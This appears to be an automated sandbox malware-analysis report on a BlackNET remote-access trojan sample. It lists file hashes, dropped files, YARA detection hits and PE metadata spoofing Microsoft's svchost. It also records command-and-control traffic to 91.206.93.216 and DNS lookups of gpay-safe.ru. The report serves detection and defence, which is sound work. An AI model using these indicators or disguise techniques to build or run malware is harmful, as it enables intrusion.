                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Remo#\bc6a0a01a7bd9d05ca132f229184fce6\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\ae8d6eb6689c9ca2
                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\winhost.exe.log
                                          Process:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1046
                                          Entropy (8bit):5.260701310698336
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk70OAEaAN0hK9C4XXhK9yi0z6+xai0r:ML2pBLaYgioQxAfAiK/XhKoRL+r
                                          MD5:E374C1DD777BBD7BD346BC6677EF6864
                                          SHA1:5D6CD3DC97DA1FC6EA2BDD0E3DF84BB4CDE305F8
                                          SHA-256:150A0F0A59A04F7023A5F7E8C1739949B1CD40D15550FDBC58F7616AF24E2A30
                                          SHA-512:AB0F378628DCE34C1341583749E879EBA40FCD525977A642D0623E53DD174EDB53D061C29AE585244537BDFB6E469A590D954FE291F83154829B1937FD273670
                                          Malicious:false
                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Remo#\bc6a0a01a7bd9d05ca132f229184fce6\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\ae8d6eb6689c9ca2
                                          C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Process:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):78336
                                          Entropy (8bit):5.573626199522469
                                          Encrypted:false
                                          SSDEEP:1536:rRJABDWoKGVG6BOiBQAh4QiObju5FBHIIMLtfn:dJ3GVGdiBQAeQiObjsFBHIbl
                                          MD5:BC15770F9C1C0735CB5CC9D800476AB0
                                          SHA1:7700F53B4DE7ABCD0AA28A1989F73AAD394B49BB
                                          SHA-256:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07AEFE322FABB3B61D079F
                                          SHA-512:1073A97FBD39F6D96B05D8A52F8D1E9759B879D9FCF4089F1159A3CBED55E0CA6B3DA529DF09BAE0F1C37C259C482C7E56D279E7C0AFA58C6F3CBAFF615762D4
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: SUSP_Modified_SystemExeFileName_in_File, Description: Detecst a variant of a system file name often used by attackers to cloak their activity, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: HKTL_NET_GUID_BlackNET, Description: Detects VB.NET red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Arnim Rupp
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: Metadefender, Detection: 56%, Browse
                                          • Antivirus: ReversingLabs, Detection: 85%
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.._.................&..........~D... ........@.. ...............................'....@.................................(D..S....`............................................................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B................`D......H..........P...........h...p............................................0..........(....(.......(.....o....*......................(......o......o......o......o....*F.(....o....o....*..(....*.s.........s.........s.........s.........s.........*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............{....(...+}.....{....*...{....3.*.,.r...ps....z..|....o...+*...0................,.........o....9....~.
                                          C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.Identifier
                                          Process:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview: [ZoneTransfer]....ZoneId=0
                                          \Device\Null
                                          Process:C:\Windows\System32\PING.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):279
                                          Entropy (8bit):4.814768129371003
                                          Encrypted:false
                                          SSDEEP:6:PzXULmWxHLTpUryacsW3CNcwAFeMmvVOIHJFxMVlmJHaVFSILP8v:P+pTpcxcsTDAFSkIrxMVlmJHaVov
                                          MD5:95A097C89A9D2D1AB477B4F65F864DBB
                                          SHA1:1089E7F3A9342C44AEBD959E3C211AC4C609882F
                                          SHA-256:3F96951AAEE3A5420B6DBD4045C6E8DD246BB661695B47B952C2083E267337A2
                                          SHA-512:DE2BB1C4A1D75BD64CF46187A713F2A0768F6F01E5C2022E7E5498E99478662B519DC1825EA280B799745EE3F7604B273CB56B9B6CE89B2EFF244393D822682C
                                          Malicious:false
                                          Preview: ..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=21ms TTL=57....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 21ms, Maximum = 21ms, Average = 21ms..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):5.573626199522469
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File size:78336
                                          MD5:bc15770f9c1c0735cb5cc9d800476ab0
                                          SHA1:7700f53b4de7abcd0aa28a1989f73aad394b49bb
                                          SHA256:4054ee21cbfc210489f119c2d717ca1ae43129fc0d07aefe322fabb3b61d079f
                                          SHA512:1073a97fbd39f6d96b05d8a52f8d1e9759b879d9fcf4089f1159a3cbed55e0ca6b3da529df09bae0f1c37c259c482c7e56d279e7c0afa58c6f3cbaff615762d4
                                          SSDEEP:1536:rRJABDWoKGVG6BOiBQAh4QiObju5FBHIIMLtfn:dJ3GVGdiBQAeQiObjsFBHIbl
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.._.................&..........~D... ........@.. ...............................'....@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x41447e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x5F9CBA43 [Sat Oct 31 01:13:39 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v2.0.50727
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x144280x53.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x68e.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x124840x12600False0.426246279762data5.6461905054IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0x160000x68e0x800False0.35595703125data3.63711189569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x180000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0x160a00x404data
                                          RT_MANIFEST0x164a40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyright Microsoft Corporation. All rights reserved.
                                          Assembly Version10.0.18362.1
                                          InternalNamesvchost.exe
                                          FileVersion10.0.18362.1
                                          CompanyNameMicrosoft Corporation
                                          CommentsHost Process for Windows Services
                                          ProductNameMicrosoft Windows Operating System
                                          ProductVersion10.0.18362.1
                                          FileDescriptionWindows Update Assistant
                                          OriginalFilenamesvchost.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          08/25/21-00:49:10.577457TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4972480192.168.2.491.206.93.216
                                          08/25/21-00:49:12.133936ICMP382ICMP PING Windows192.168.2.41.1.1.1
                                          08/25/21-00:49:12.133936ICMP384ICMP PING192.168.2.41.1.1.1
                                          08/25/21-00:49:12.151592ICMP408ICMP Echo Reply1.1.1.1192.168.2.4
                                          08/25/21-00:49:15.404287TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4972580192.168.2.491.206.93.216
                                          08/25/21-00:49:16.258339TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4972580192.168.2.491.206.93.216
                                          08/25/21-00:49:17.348013ICMP382ICMP PING Windows192.168.2.41.1.1.1
                                          08/25/21-00:49:17.348013ICMP384ICMP PING192.168.2.41.1.1.1
                                          08/25/21-00:49:17.364980ICMP408ICMP Echo Reply1.1.1.1192.168.2.4
                                          08/25/21-00:49:25.372049TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4972680192.168.2.491.206.93.216
                                          08/25/21-00:49:27.016192ICMP382ICMP PING Windows192.168.2.41.1.1.1
                                          08/25/21-00:49:27.016192ICMP384ICMP PING192.168.2.41.1.1.1
                                          08/25/21-00:49:27.032962ICMP408ICMP Echo Reply1.1.1.1192.168.2.4
                                          08/25/21-00:49:29.754648TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4972780192.168.2.491.206.93.216
                                          08/25/21-00:49:30.652084TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4972780192.168.2.491.206.93.216
                                          08/25/21-00:49:31.675748ICMP382ICMP PING Windows192.168.2.41.1.1.1
                                          08/25/21-00:49:31.675748ICMP384ICMP PING192.168.2.41.1.1.1
                                          08/25/21-00:49:31.693113ICMP408ICMP Echo Reply1.1.1.1192.168.2.4
                                          08/25/21-00:49:34.260885TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4973080192.168.2.491.206.93.216
                                          08/25/21-00:49:35.357152TCP2029179ET TROJAN Win32/BlackNET CnC Keep-Alive4973080192.168.2.491.206.93.216
                                          08/25/21-00:49:37.693022ICMP382ICMP PING Windows192.168.2.41.1.1.1
                                          08/25/21-00:49:37.693022ICMP384ICMP PING192.168.2.41.1.1.1
                                          08/25/21-00:49:37.713967ICMP408ICMP Echo Reply1.1.1.1192.168.2.4

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 25, 2021 00:49:10.365606070 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:10.462574005 CEST804972491.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:10.462688923 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:10.466486931 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:10.563071012 CEST804972491.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:10.563898087 CEST804972491.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:10.577456951 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:10.675556898 CEST804972491.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:10.724242926 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:12.321815968 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:12.420679092 CEST804972491.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:12.474530935 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:12.948219061 CEST4972480192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:15.214610100 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:15.305600882 CEST804972591.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:15.305686951 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:15.306813002 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:15.397294044 CEST804972591.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:15.397839069 CEST804972591.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:15.404287100 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:15.495248079 CEST804972591.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:15.537134886 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:16.258338928 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:16.348107100 CEST804972591.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:16.366950989 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:16.456933975 CEST804972591.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:16.508991003 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:17.575655937 CEST4972580192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:25.158457041 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:25.260006905 CEST804972691.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:25.260255098 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:25.262612104 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:25.364553928 CEST804972691.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:25.366013050 CEST804972691.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:25.372049093 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:25.474937916 CEST804972691.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:25.522367954 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:27.169502974 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:27.271891117 CEST804972691.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:27.319479942 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:28.168478966 CEST4972680192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:29.545062065 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:29.644984007 CEST804972791.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:29.645200968 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:29.646075964 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:29.746197939 CEST804972791.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:29.747039080 CEST804972791.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:29.754647970 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:29.854893923 CEST804972791.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:29.913408995 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:30.652084112 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:30.754179001 CEST804972791.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:30.766211987 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:30.866970062 CEST804972791.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:30.913463116 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:31.476210117 CEST4972780192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:34.042249918 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:34.143327951 CEST804973091.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:34.146258116 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:34.147334099 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:34.248514891 CEST804973091.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:34.248711109 CEST804973091.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:34.260885000 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:34.364558935 CEST804973091.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:34.523206949 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:35.357151985 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:35.458375931 CEST804973091.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:35.487190008 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:35.589535952 CEST804973091.206.93.216192.168.2.4
                                          Aug 25, 2021 00:49:35.677423954 CEST4973080192.168.2.491.206.93.216
                                          Aug 25, 2021 00:49:37.912559032 CEST4973080192.168.2.491.206.93.216

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 25, 2021 00:48:58.531050920 CEST5912353192.168.2.48.8.8.8
                                          Aug 25, 2021 00:48:58.565023899 CEST53591238.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:10.261408091 CEST5453153192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:10.351469040 CEST53545318.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:15.161828995 CEST4971453192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:15.195938110 CEST53497148.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:25.048155069 CEST5802853192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:25.141108036 CEST53580288.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:29.496506929 CEST5309753192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:29.531724930 CEST53530978.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:30.426490068 CEST4925753192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:30.466761112 CEST53492578.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:33.990952015 CEST6238953192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:34.023390055 CEST53623898.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:55.349636078 CEST4991053192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:55.425941944 CEST53499108.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:55.892905951 CEST5585453192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:55.927673101 CEST53558548.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:56.658900023 CEST6454953192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:56.669356108 CEST6315353192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:56.699084997 CEST53645498.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:56.709753036 CEST53631538.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:57.082869053 CEST5299153192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:57.118884087 CEST53529918.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:57.583236933 CEST5370053192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:57.621784925 CEST53537008.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:58.163708925 CEST5172653192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:58.196003914 CEST53517268.8.8.8192.168.2.4
                                          Aug 25, 2021 00:49:59.161530972 CEST5679453192.168.2.48.8.8.8
                                          Aug 25, 2021 00:49:59.199778080 CEST53567948.8.8.8192.168.2.4
                                          Aug 25, 2021 00:50:00.413264990 CEST5653453192.168.2.48.8.8.8
                                          Aug 25, 2021 00:50:00.445626974 CEST53565348.8.8.8192.168.2.4
                                          Aug 25, 2021 00:50:01.038789988 CEST5662753192.168.2.48.8.8.8
                                          Aug 25, 2021 00:50:01.074285030 CEST53566278.8.8.8192.168.2.4
                                          Aug 25, 2021 00:50:01.422975063 CEST5662153192.168.2.48.8.8.8
                                          Aug 25, 2021 00:50:01.458163977 CEST53566218.8.8.8192.168.2.4
                                          Aug 25, 2021 00:50:08.926778078 CEST6311653192.168.2.48.8.8.8
                                          Aug 25, 2021 00:50:08.968209982 CEST53631168.8.8.8192.168.2.4
                                          Aug 25, 2021 00:50:41.902863026 CEST6407853192.168.2.48.8.8.8
                                          Aug 25, 2021 00:50:41.927185059 CEST53640788.8.8.8192.168.2.4
                                          Aug 25, 2021 00:50:43.564588070 CEST6480153192.168.2.48.8.8.8
                                          Aug 25, 2021 00:50:43.618093014 CEST53648018.8.8.8192.168.2.4

                                          ICMP Packets

                                          TimestampSource IPDest IPChecksumCodeType
                                          Aug 25, 2021 00:49:12.133935928 CEST192.168.2.41.1.1.14d5aEcho
                                          Aug 25, 2021 00:49:12.151592016 CEST1.1.1.1192.168.2.4555aEcho Reply
                                          Aug 25, 2021 00:49:17.348012924 CEST192.168.2.41.1.1.14d59Echo
                                          Aug 25, 2021 00:49:17.364979982 CEST1.1.1.1192.168.2.45559Echo Reply
                                          Aug 25, 2021 00:49:27.016191959 CEST192.168.2.41.1.1.14d58Echo
                                          Aug 25, 2021 00:49:27.032962084 CEST1.1.1.1192.168.2.45558Echo Reply
                                          Aug 25, 2021 00:49:31.675748110 CEST192.168.2.41.1.1.14d57Echo
                                          Aug 25, 2021 00:49:31.693113089 CEST1.1.1.1192.168.2.45557Echo Reply
                                          Aug 25, 2021 00:49:37.693022013 CEST192.168.2.41.1.1.14d56Echo
                                          Aug 25, 2021 00:49:37.713967085 CEST1.1.1.1192.168.2.45556Echo Reply

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Aug 25, 2021 00:49:10.261408091 CEST192.168.2.48.8.8.80xf789Standard query (0)gpay-safe.ruA (IP address)IN (0x0001)
                                          Aug 25, 2021 00:49:15.161828995 CEST192.168.2.48.8.8.80x9d4Standard query (0)gpay-safe.ruA (IP address)IN (0x0001)
                                          Aug 25, 2021 00:49:25.048155069 CEST192.168.2.48.8.8.80x4bcaStandard query (0)gpay-safe.ruA (IP address)IN (0x0001)
